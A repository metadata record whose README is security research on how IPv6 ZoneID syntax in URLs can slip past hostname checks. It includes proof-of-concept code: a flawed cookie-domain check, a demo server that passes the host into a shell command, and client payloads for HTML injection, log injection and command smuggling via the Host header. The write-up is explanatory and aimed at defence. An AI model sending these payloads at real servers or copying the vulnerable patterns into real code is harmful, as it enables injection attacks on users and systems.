{"id":26248032,"url":"https://github.com/mauricelambert/urlipv6zoneidsecurity","last_synced_at":"2025-03-13T14:16:45.041Z","repository":{"id":280150077,"uuid":"941128025","full_name":"mauricelambert/UrlIPv6ZoneIdSecurity","owner":"mauricelambert","description":"Research about few security problems and bugs caused by the host element for modern URI.","archived":false,"fork":false,"pushed_at":"2025-03-01T15:03:57.000Z","size":25,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-03-01T16:18:46.451Z","etag":null,"topics":["bugs","cybersecurity","exploit","research","rfc","uri"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mauricelambert.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2025-03-01T15:00:01.000Z","updated_at":"2025-03-01T15:08:59.000Z","dependencies_parsed_at":"2025-03-01T16:18:48.317Z","dependency_job_id":"75bff24b-153e-4b92-9934-12898afbba3e","html_url":"https://github.com/mauricelambert/UrlIPv6ZoneIdSecurity","commit_stats":null,"previous_names":["mauricelambert/urlipv6zoneidsecurity"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mauricelambert%2FUrlIPv6ZoneIdSecurity","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mauricelambert%2FUrlIPv6ZoneIdSecurity/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mauricelambert%2FUrlIPv6ZoneIdSecurity
/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mauricelambert%2FUrlIPv6ZoneIdSecurity/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mauricelambert","download_url":"https://codeload.github.com/mauricelambert/UrlIPv6ZoneIdSecurity/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":243419124,"owners_count":20287806,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bugs","cybersecurity","exploit","research","rfc","uri"],"created_at":"2025-03-13T14:16:44.129Z","updated_at":"2025-03-13T14:16:45.021Z","avatar_url":"https://github.com/mauricelambert.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# RFC 6874 - IPv6 Zone ID in URL\r\n\r\n## Summary\r\n\r\n[RFC 6874 - Representing IPv6 Zone Identifiers in Address Literals and Uniform Resource Identifiers](https://www.ietf.org/rfc/rfc6874.txt) adds support for [RFC 4007 - IPv6 Scoped Address Architecture](https://www.ietf.org/rfc/rfc4007.txt) in URIs.\r\n\r\nI think this RFC can cause a few security problems and bugs because the ZoneID can contain many different characters.\r\n\r\n## Context\r\n\r\n[RFC 3986 - Uniform Resource Identifier (URI): Generic Syntax](https://www.ietf.org/rfc/rfc3986.txt) uses [RFC 3513 - Internet Protocol Version 6 (IPv6) Addressing Architecture](https://www.ietf.org/rfc/rfc3513.txt) to define the IPv6 address syntax as follows:\r\n\r\n```\r\n IPv6address =                            6( h16 \":\" ) ls32\r\n                  /                       \"::\" 
5( h16 \":\" ) ls32\r\n                  / [               h16 ] \"::\" 4( h16 \":\" ) ls32\r\n                  / [ *1( h16 \":\" ) h16 ] \"::\" 3( h16 \":\" ) ls32\r\n                  / [ *2( h16 \":\" ) h16 ] \"::\" 2( h16 \":\" ) ls32\r\n                  / [ *3( h16 \":\" ) h16 ] \"::\"    h16 \":\"   ls32\r\n                  / [ *4( h16 \":\" ) h16 ] \"::\"              ls32\r\n                  / [ *5( h16 \":\" ) h16 ] \"::\"              h16\r\n                  / [ *6( h16 \":\" ) h16 ] \"::\"\r\n\r\n      ls32        = ( h16 \":\" h16 ) / IPv4address\r\n                  ; least-significant 32 bits of address\r\n\r\n      h16         = 1*4HEXDIG\r\n                  ; 16 bits of address represented in hexadecimal\r\n```\r\n\r\nRFC 4007 defines a `ZoneID` appended to the IPv6 address, and RFC 6874 updates RFC 3986 to support the `ZoneID` with the following format:\r\n\r\n```\r\nIPv6addrz = IPv6address \"%25\" ZoneID\r\n```\r\n\r\n## Problems\r\n\r\nThe `host` element of a URI is important and is used in many places:\r\n\r\n - Deciding where cookies or credentials should be sent\r\n - `Host` header in HTTP\r\n - *hostname* to identify the server in logs (for example, on a proxy)\r\n - Possibly displayed in some web pages\r\n - In insecurely evaluated code\r\n\r\n### Why\r\n\r\n - Many developers trust the *hostname* because they assume it is very simple: the set of allowed characters is limited and does not include special characters.\r\n - But that is false: we have the `IPvFuture` format (defined in RFC 3986):\r\n\r\n```\r\nIPvFuture  = \"v\" 1*HEXDIG \".\" 1*( unreserved / sub-delims / \":\" )\r\n```\r\n\r\n - And we have the IPv6 with `ZoneID` format defined in RFC 6874.\r\n\r\n## POC and simplified examples\r\n\r\n### Send a cookie\r\n\r\n```python\r\nfrom urllib.parse import urlparse\r\nfrom fnmatch import fnmatch\r\nfrom typing import Tuple\r\n\r\ndef get_hostname_and_path(url: str) -\u003e Tuple[str, str]:\r\n    \"\"\"\r\n    
This function returns hostname and path from a URL.\r\n    \"\"\"\r\n\r\n    parsed_url = urlparse(url)\r\n    hostname = parsed_url.hostname\r\n    path = parsed_url.path\r\n    return hostname, path\r\n\r\ndef cookie_validate(cookie_domain: str, cookie_path: str, url: str) -\u003e bool:\r\n    \"\"\"\r\n    This function checks whether a cookie should be added to a request for a URL.\r\n    \"\"\"\r\n\r\n    hostname, path = get_hostname_and_path(url)\r\n\r\n    if hostname.endswith(cookie_domain) and path.startswith(cookie_path):\r\n        return True\r\n    return False\r\n\r\ncookie_domain = \"example.com\"\r\ncookie_path = \"/\"\r\n\r\nfor url in (\"http://example.com/\", \"http://google.com/\", \"http://[::1%example.com]/\"):\r\n    print(url, cookie_validate(cookie_domain, cookie_path, url))\r\n```\r\n\r\nThis weak example is vulnerable and produces the following output:\r\n\r\n```\r\nhttp://example.com/ True\r\nhttp://google.com/ False\r\nhttp://[::1%example.com]/ True\r\n```\r\n\r\n#### Exploitation\r\n\r\n[RFC 6265 - HTTP State Management Mechanism](https://www.rfc-editor.org/rfc/rfc6265) defines how the cookie domain should match the URI host:\r\n\r\n```\r\n5.1.3.  Domain Matching\r\n\r\n   A string domain-matches a given domain string if at least one of the\r\n   following conditions hold:\r\n\r\n   o  The domain string and the string are identical.  (Note that both\r\n      the domain string and the string will have been canonicalized to\r\n      lower case at this point.)\r\n\r\n   o  All of the following conditions hold:\r\n\r\n      *  The domain string is a suffix of the string.\r\n\r\n      *  The last character of the string that is not included in the\r\n         domain string is a %x2E (\".\") character.\r\n\r\n      *  The string is a host name (i.e., not an IP address).\r\n```\r\n\r\nOkay, so a *Host* given as an IP address can't suffix-match a cookie domain on the next request... 
But that depends on how clients and servers implement it.\r\n\r\n##### Implementations\r\n\r\nNow let's check whether this can be exploited in a few implementations:\r\n\r\n1. Python standard library (**not vulnerable**): it keeps the square brackets `[]` when validating the host ([code](https://github.com/python/cpython/blob/ddc27f9c385f57db1c227b655ec84dcf097a8976/Lib/http/cookiejar.py#L619)):\r\n\r\n```python\r\ncut_port_re = re.compile(r\":\\d+$\", re.ASCII)\r\ndef request_host(request):\r\n    \"\"\"Return request-host, as defined by RFC 2965.\r\n\r\n    Variation from RFC: returned value is lowercased, for convenient\r\n    comparison.\r\n\r\n    \"\"\"\r\n    url = request.get_full_url()\r\n    host = urllib.parse.urlparse(url)[1]\r\n    if host == \"\":\r\n        host = request.get_header(\"Host\", \"\")\r\n\r\n    # remove port, if present\r\n    host = cut_port_re.sub(\"\", host, 1)\r\n    return host.lower()\r\n```\r\n\r\n2. Go standard library (**not vulnerable**): it checks for `:` or `%` in the host ([code](https://cs.opensource.google/go/go/+/refs/tags/go1.24.0:src/net/http/client.go;l=1020;drc=6b605505047416bbbf513bba1540220a8897f3f6)):\r\n\r\n```go\r\nfunc isDomainOrSubdomain(sub, parent string) bool {\r\n    if sub == parent {\r\n        return true\r\n    }\r\n    // If sub contains a :, it's probably an IPv6 address (and is definitely not a hostname).\r\n    // Don't check the suffix in this case, to avoid matching the contents of a IPv6 zone.\r\n    // For example, \"::1%.www.example.com\" is not a subdomain of \"www.example.com\".\r\n    if strings.ContainsAny(sub, \":%\") {\r\n        return false\r\n    }\r\n    // If sub is \"foo.example.com\" and parent is \"example.com\",\r\n    // that means sub must end in \".\"+parent.\r\n    // Do it without allocating.\r\n    if !strings.HasSuffix(sub, parent) {\r\n        return false\r\n    }\r\n    return sub[len(sub)-len(parent)-1] == '.'\r\n}\r\n```\r\n\r\n3. 
python-requests (urllib3, **not vulnerable**): ZoneID is not really supported (when you perform a request with a ZoneID, it tries to resolve it as a hostname)\r\n4. Ruby (**not vulnerable**): ZoneID is not supported\r\n\r\n### Injection\r\n\r\nThere are too many HTTP servers, so I did not check every implementation, module, plugin, web app... But there are probably multiple vulnerable servers running.\r\n\r\nI wrote a minimal server and HTTP client for the demonstration:\r\n\r\n#### Server\r\n\r\n```python\r\nfrom typing import Dict, Tuple, List, Callable, Iterable, Union\r\nfrom wsgiref.simple_server import make_server, WSGIServer\r\nfrom io import TextIOWrapper, BufferedReader\r\nfrom wsgiref.util import FileWrapper\r\nfrom urllib.parse import urlparse\r\nfrom socket import AF_INET6\r\nfrom logging import warning\r\nfrom os import system\r\n\r\ntemplate = \"\"\"\u003c!DOCTYPE html\u003e\r\n\u003chtml\u003e\r\n\u003chead\u003e\r\n    \u003cmeta charset=\"utf-8\"\u003e\r\n    \u003cmeta name=\"viewport\" content=\"width=device-width, initial-scale=1\"\u003e\r\n    \u003ctitle\u003e\u003c/title\u003e\r\n\u003c/head\u003e\r\n\u003cbody\u003e\r\n    \u003ch1\u003eWelcome on {} !\u003c/h1\u003e\r\n\u003c/body\u003e\r\n\u003c/html\u003e\"\"\"\r\n\r\nclass WSGIServerIPv6(WSGIServer):\r\n    address_family = AF_INET6\r\n\r\ndef get_full_url(environ) -\u003e str:\r\n    \"\"\"\r\n    This function returns the full URL for a WSGI server.\r\n    \"\"\"\r\n\r\n    scheme = environ.get('wsgi.url_scheme', 'http')\r\n    host = environ.get('HTTP_HOST', environ.get('SERVER_NAME'))\r\n    path = environ.get('PATH_INFO', '')\r\n    query = environ.get('QUERY_STRING', '')\r\n    full_url = f\"{scheme}://{host}{path}\"\r\n    if query:\r\n        full_url += f\"?{query}\"\r\n    return full_url\r\n\r\ndef application(environ: Dict[str, Union[str, bool, BufferedReader, TextIOWrapper, FileWrapper, Tuple[int, int]]], start_response: Callable[[str, List[Tuple[str, str]]], Callable[[bytes], object]]) -\u003e 
Iterable[bytes]:\r\n    \"\"\"\r\n    This function implements a minimal WSGI server for the POC.\r\n    \"\"\"\r\n\r\n    hostname = urlparse(get_full_url(environ)).hostname\r\n    response = template.format(hostname)\r\n    warning(\"Request for \" + hostname)\r\n    system(f'ping \"{hostname}\"')\r\n    status = '200 OK'\r\n    headers = [('Content-type', 'text/html')]\r\n    start_response(status, headers)\r\n    return [response.encode('utf-8')]\r\n\r\nif __name__ == '__main__':\r\n    with make_server('::1', 8000, application, WSGIServerIPv6) as httpd:\r\n        print(\"Serving on port 8000...\")\r\n        httpd.serve_forever()\r\n```\r\n\r\n#### Client\r\n\r\n```python\r\nimport socket\r\n\r\nfor payload in (\r\n    \"\u003cimg onerror=\\\"alert(1)\\\"\u003eHTML injection\",\r\n    \"log injection: malicious log !\",\r\n    \"code injection\\\" | echo \\\"Malicious payload\"\r\n):\r\n    s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)\r\n    s.connect((\"::1\", 8000))\r\n    request = f\"GET / HTTP/1.1\\r\\nHost: [::1%{payload}]\\r\\n\\r\\n\".encode()\r\n    s.sendall(request)\r\n    response = True\r\n    while response:\r\n        response = s.recv(4096)\r\n        print(response.decode().strip())\r\n    s.close()\r\n```\r\n\r\n#### Demonstrations\r\n\r\n##### Server output\r\n\r\n```\r\n::1 - - [01/Mar/2025 14:25:32] \"GET / HTTP/1.1\" 200 252\r\nWARNING:root:Request for ::1%\u003cimg onerror=\"alert(1)\"\u003eHTML injection\r\nPing request could not find host ::1%\u003cimg onerror=alert(1)\u003eHTML injection. Please check the name and try again.\r\n::1 - - [01/Mar/2025 14:26:29] \"GET / HTTP/1.1\" 200 249\r\nWARNING:root:Request for ::1%log injection: malicious log !\r\nPing request could not find host ::1%log injection: malicious log !. 
Please check the name and try again.\r\n::1 - - [01/Mar/2025 14:26:29] \"GET / HTTP/1.1\" 200 241\r\nWARNING:root:Request for ::1%code injection\" | echo \"Malicious payload\r\n\"Malicious payload\"\r\n::1 - - [01/Mar/2025 14:26:29] \"GET / HTTP/1.1\" 200 252\r\n```\r\n\r\nThree vulnerabilities are exploited:\r\n\r\n1. XSS (steal user or administrator sessions)\r\n2. Log injection (hide malicious events, RCE with PHP or a templating system, ...)\r\n3. Code injection (execute malicious code; in my demonstration it's a system command, but similar vulnerabilities can target any other syntax: PHP, SQL, JavaScript, Python, ...)\r\n\r\n## Conclusion\r\n\r\n - **Don't trust any field, including a valid and parsed host or IP**\r\n - If you are a developer, talk about these problems with your colleagues\r\n - If you work in `DevSecOps`, treat the *host* as user input (even if you use a secure parser)\r\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmauricelambert%2Furlipv6zoneidsecurity","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmauricelambert%2Furlipv6zoneidsecurity","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmauricelambert%2Furlipv6zoneidsecurity/lists"}